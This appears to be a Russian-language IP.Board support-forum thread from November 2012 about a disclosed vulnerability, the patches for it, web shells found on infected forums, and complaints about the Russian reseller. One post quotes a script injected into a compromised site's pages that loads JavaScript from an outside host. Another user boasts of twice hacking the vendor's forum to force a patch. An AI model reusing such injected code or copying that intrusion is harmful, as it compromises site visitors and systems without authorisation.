Опубликовано: 2 ноября 201213 г ИБРовцы похоже еще спят http://forums.ibresource.ru/index.php?/topic/64826/ :)если прошурстить у них в /cache/ наверняка и шелл найдется) Патчи от 6 ноября 2012 для ИБР версийhttp://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70490
Опубликовано: 11 ноября 201213 г еще в папке uploads находилось три файла: 33e34866fa7dd24bc7d0091daae6031f.php, b65840916dc6f0ccc3b41fc9611e7e02.php и f9a859fa33368da398a7eb96773fb836.php
Опубликовано: 11 ноября 201213 г А знаете что бесит больше всего?! То что до выхода этих обновлений, все было отлично. Как только стало известно что есть дыра и то что вышел патч, то сразу же начались заливки шеллов... Мне кажется уж лучше бы сделали обновление дистра и просто предложили обновиться, тихо и молча ))) За последние 2 года я лично отправлял около 40 репортов об уязвимостях большей или меньшей сложности. Был и код, кладущий сервер "на лопатки", и XSS, и SQL Injection, и много чего еще. Все это молча латалось в очередном обновлении. А в данном случае проблема не в том, какая открылась дыра, и не в том, как отреагировали IPS, а в том, КТО нашел дыру. Этот типичный "фрилансер - специалист по безопасности", которому необходима слава и известность, и потому, только открыв уязвимость, он тут же радостно распихал код своего эксплоита по всем существующим в мире хак-ресурсам, так что ни о каком "тихом" закрытии дыры речь уже не шла. Hi, my name is Egidio Romano (aka EgiX) and I'm a freelance web application security researcher.Погуглите эту фразу. Этот человек регулярно кидает сразу в паблик найденные дыры во всех подряд продуктах. Посылайте лучики любви ему.
Опубликовано: 11 ноября 201213 г Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки??
Опубликовано: 11 ноября 201213 г Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки?? Потому что им как всегда насмешить на своих клиентов, не? :)
Опубликовано: 11 ноября 201213 г Потому что им как всегда насмешить на своих клиентовПолностью согласен, да они как мне известно и продавать то ее уже не имеют право.
Опубликовано: 11 ноября 201213 г У них сейчас другая игрушка, а с IP.Board они просто "додаивают" остатки денег. Переводы давно не обновляют - тупо меняют циферки версии и добавляют пару строк. Паджинатор как перевели неправильно полгода назад - так и не исправили. Компоненты все отстали уже на 1-2 версии от IPS-овских, а галерея так и вообще на 5 минорных и одну мажорную. Форум заброшен и часто вообще не работает. "Русификацию" свою нифига не тестируют. За новостями и патчами не следят. Минимум телодвижений. Да и зачем? Другая игрушка есть, а IPB не удаляется по одной причине - пока дураки деньги просто так будут нести - будут брать. Как нести перенстанут - закроют лавочку.
Опубликовано: 12 ноября 201213 г @Семёныч, пока не появится в России нормальный реселлер, покупать русскую версию негде. Увы.Видимо свои форумы буду конвертировать в Битрикс и LogicBoard (один конвертировал, функциональности меньше, но терпимо, работает). Но..Первый вариант слишком дорог, не всем пойдет, а также жрет ну очень много ресурсов, малофункционален, но вроде как надежен - все-таки фреймворк от серьезного разработчика. Второй вариант дешев, тоже малофункционален (но поболее нежели у Битрикс), совсем нет шаблонов дизайна, а самому кастомизировать непросто - сложнее нежели для IPB, разработчик - одиночка, форум поддержки нагло окупировали спамеры и бессовестно предлагают свои услуги - как-то все получается несерьезно.А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©.
Опубликовано: 12 ноября 201213 г @Ritsuka, А где ж тогда покупать русскоязычную версию???Берешь eng. Далее можешь перелопатить ее как угодно.При наличии времени и опыта - конечно.
Опубликовано: 12 ноября 201213 г Ritsuka, А где ж тогда покупать русскоязычную версию??? Полный бесплатный русский перевод от Yurri: http://community.invisionpower.com/files/file/5545-full-russian-suite-for-ipboard-3rd-apps- Русский перевод от IBR, бесплатно залитый на IPS и обновляемый "энтузиастом" (содержит забавные косяки):http://community.invisionpower.com/files/file/5437-russian-language-pack-for-ipb-32x-and-higher-proper-translation/ А еще на 19% выполнен бесплатный коллективный перевод скрипта на русский язык:http://community.invisionpower.com/index.php?app=languages Можете просто взять любой готовый, или поучаствовать в коллективной работе по переводу. А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©. Что-то вы все больше становитесь похожим на спам. Ну ок, вы разочаровались в этой жизни, в IPB и вообще - ведь как же так, "за целых 4 года вдруг внезапно моментально запатченная дырка нашлась! никакой уверенности в завтрашнем дне!!!111" - но это еще не дает вам оснований во всех подряд темах и разделах, где люди спрашивают, как им решить проблемы с IP.Board, влезать с предложениями о переходе на другой скрипт. Мало того, что это никак не помогает в решении проблемы и вообще является оффтопом, это еще и раздражает. спам кончил баном. А вы как планируете?
Опубликовано: 12 ноября 201213 г Тема плавн оперешла в другое направление. Но я все вспрошу Ritsuka - какой по твоему мнению самый достойный перевод? от Yurri?
Опубликовано: 12 ноября 201213 г Что-то вы все больше становитесь похожим на спамУ людей иногда бывает схожесть. Особенно если не вникать в мировоззрение собеседника, и вообще его не слушать (а только себя), но перед этим первым предложить беседовать. А нудишь как раз сам. Начал нудеть на форуме IBR, продолжил на форуме и блогах IPS - всюду тебя забанили, что "наши", что "не наши". Когда такие юноши как ты попадали служить в мое подразделение, как раз мне приходилось стоять у изголовья чуть ли не каждую ночь, чтобы не дай Бог кто-нить не обидел. А теперь можешь и меня забанить.
Опубликовано: 12 ноября 201213 г А теперь можешь и меня забанить. Зачем? Пусть другие администраторы решают. На IPS я, кстати, не совсем забанен, а в ридонли, и случилось это по 2 эпизодам: 1. Как-то отрепортив очередной критический баг, я, устав в течении 2 недель ждать очередного пачта или хоть какой-то реакции, дважды взломал через него их официальный форум. После этого уже через 2 дня вышел патч, но на меня обиделись. 2. Когда выходил IP.Nexus я активно сопротивлялся тому, чтобы он был закодирован, аппелируя к асбурдности аргумента "так будет безопаснее". И был прав - все платежные гейтвеи в конечном счете все равно оставили с открытым кодом (и где безопасность?), а закодированный код приложения не позволяет эффективно выявлять и исправлять многочисленные ошибки в скриптах - и в конечном итоге получилось, что, когда мои знакомые, или люди тут на форуме просят помочь с нексусом - ничего не остается, кроме как посылать всех в IPS. А про IBR тут все и так знают - их было, и сейчас есть за что критиковать. Форум тогда каждый день наполнялся сотней спам-постов, а IBR было начхать. Единственной реакцией на все претензии был бан. Ну, зато хоть теперь спама нет. Правда, это не отменяет факта, что им и сейчас на все начхать, посмотрите хотя бы на первые строки кода страниц на их форуме:<!--Csoul--><script type="text/javascript"><!-- var url = 'http://dosxfgb.servebbs.net'; document.write('<sc' + 'ript language="JavaScript" ' + 'src="' + url + '/6201/counter.xhtml"></sc' + 'ript>') //--></script><!--/Csoul--><!DOCTYPE html> Как затроянили им форум - так никто и не потрудился почистить. Я называю "нудением" случаи, когда люди сгущают краски и рассказывают, как им самим плохо, выставляя их личные трудности как недостатки продукта. Вы выше писали, что у вас проблемы с излишне обостренным патриотизмом и с не знанием языков, и что именно это мешает вам продложать пользоваться IP.Board. Ок, вы имеете право на такую проблему. Но стоит ли теперь ходить и рассказывать всем, что "IP.Board умирает, надо искать альтернативы"? Вы что, считаете, что тем, кто осознанно выбрал IP.Board и имеет опыт общения с иностранными сайтами, ваши стоны кажутся актуальными? Тем более что один раз вы уже высказали свое мнение, и никто вам не мешал. Зачем теперь тиражировать ваше абстрактное субъективное по всем другим конкретным темам форума?
Опубликовано: 12 ноября 201213 г Автор @GeoLik, и остальные желающие "переехать" на другие платформы, создавайте отдельно тему и обсуждайте там свой переезд, да и вообще можете перенести свое общение на ресурсах поддержки этих движков. Здесь форум поддержки ИПБ а не каких-то ЛБ или битриксов. Ваши сообщения порядком уже начали подноедать, ну прямо второй ойлфорум, тот тоже в каждом сообщение ныл о переезде, а до сих пор сидит на ипб. В этом отношении полностью солидарен с @Ritsuka. На этом флуд в этой теме закончим.
Опубликовано: 12 ноября 201213 г Мужики последний вопрос, что у нас находиться в папке cache\tmp\ и можно ли ее очистить? php файлов там нет, но есть от 06.11 - когда меня заразили. Так вроде все проверил, больше нигде нету. Изменено 12 ноября 201213 г пользователем GluK
ИБРовцы похоже еще спят http://forums.ibresource.ru/index.php?/topic/64826/ :)
если прошурстить у них в /cache/ наверняка и шелл найдется)
Патчи от 6 ноября 2012 для ИБР версий
http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70490